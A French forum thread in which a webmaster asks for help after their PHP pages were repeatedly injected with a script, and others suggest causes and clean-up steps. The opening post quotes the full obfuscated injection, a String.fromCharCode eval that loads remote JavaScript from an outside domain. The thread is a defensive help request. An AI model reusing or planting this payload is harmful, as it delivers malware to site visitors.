Piratage site

Résolu
crazydancer Messages postés 2 Date d'inscription vendredi 2 janvier 2009 Statut Membre Dernière intervention 28 mars 2010 - 26 févr. 2010 à 14:10
cs_eastflo Messages postés 8 Date d'inscription mercredi 7 juillet 2010 Statut Membre Dernière intervention 20 juillet 2010 - 7 juil. 2010 à 10:43
Bonjour,

J'ai un problème sur mon site.

Régulèrement, mes pages php sont modifiées et une une balise est rajoutée commandant le téléchargement d'un fichier heureusement bloqué par mon AV.

Voici ce qui est ajouté :
<kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.from CharCode102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,
114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,112,58,47,47,115,97,101,103,104,105,101,98,101,101,115,105,111,103,111,104,46,105,110,58,51,49,50,57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>

Mon hébergeur me dit que cela viendrait d'un script, mais j'ai tout vérifié et je ne trouve rien.

Pouvez-vous m'aider?

7 réponses

syndrael Messages postés 2378 Date d'inscription lundi 4 février 2002 Statut Membre Dernière intervention 29 décembre 2012 19
26 févr. 2010 à 19:20
Est-ce que ton site propose l'upload de fichier ?
As-tu regardé le contenu de tes images ? Hélas on peut faire passer des scripts à travers des images..
Des pistes à voir parmi tant d'autres..
S.
3
gibozsec Messages postés 318 Date d'inscription mardi 27 mai 2003 Statut Membre Dernière intervention 11 mars 2010
26 févr. 2010 à 21:23
Bonjour,

Change ton mot de passe ftp après avoir passé un bon antivirus sur ton PC.

J'ai déjà eu des injections de code de ce genre après une infection.


Grrrrrrrrrrr
3
crazydancer Messages postés 2 Date d'inscription vendredi 2 janvier 2009 Statut Membre Dernière intervention 28 mars 2010
26 févr. 2010 à 21:33
Merci de cette réponse.

Mon site ne propose pas de upload.

Pour l'instant je n'ai que des pages php et images (png, jpg et gif)
Aucun script que du html en .php

Comment vérifier les images ?
0
syndrael Messages postés 2378 Date d'inscription lundi 4 février 2002 Statut Membre Dernière intervention 29 décembre 2012 19
27 févr. 2010 à 09:58
Tu peux peut etre les reprendre sur un logiciel d'édition d'image par exemple Gimp ou ToShop..
Les ouvrir, faire une modif et les sauvegarder.
Mais c'est qu'une idée..
S.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
kohntark Messages postés 3706 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
27 févr. 2010 à 10:28
Salut,

Ca peut venir de pas mal d'endroit à mon avis et il y a des chances que tu n'y puisses rien : contamination du serveur de ton hébergeur par exemple. Sa réponse est un peu limite d'ailleurs

J'imagine que tu l'as déjà trouvé, mais tu es victime de ça

Tu devrais dans un premier temps écrire qq lignes JS pour désactiver ce malware, ce qui devrait être possible, du style supprimer le script ayant une src à http://saeghiebeesiogoh.in:3129/js

Ce que je ferais ensuite serait de créer une simple page index.html vide. Tu l'appelles, tu jettes un oeil dans le code HTML reçu :
- non présence du script => c'est à ton hébergeur de gérer, sauf peut être si tu es sur un serveur dédié.
- présence du script
=> tu supprimes toutes tes autres pages, scripts, images, etc ... (en les sauvegardant évidemment) et tu ne conserves que le index.html vide.
Tu t'assures qu'il n'y a pas le code avant de l'envoyer sur le ftp.
Tu le charges sur le ftp, puis le re charges à partir de celui ci.
présence du script => c'est à ton hébergeur de gérer
Tu appelles index.html dans ton browser :
non présence du script => c'est à ton hébergeur de gérer car il y a de très grandes chances que cela vienne d'une infection du serveur.


Cordialement,


Kohntark -
0
kohntark Messages postés 3706 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
27 févr. 2010 à 10:32
Arf :
Tu l'appelles, tu jettes un oeil dans le code HTML reçu :
- non présence du script => c'est à ton hébergeur de gérer, sauf peut être si tu es sur un serveur dédié.

Non, ça peut toujours venir d'ailleurs, continue sur le point suivant.

Et tiens nous au courant.

Cordialement,

Kohntark -
0
cs_eastflo Messages postés 8 Date d'inscription mercredi 7 juillet 2010 Statut Membre Dernière intervention 20 juillet 2010
7 juil. 2010 à 10:43
Est ce que ton code est bien crypté??
Le problème peut venir de la car si on peut y accédez on peut le pirater facilement^^. C'est là l'avantage mais aussi l'inconvéniant de PHP => très/trop souple.
0
Rejoignez-nous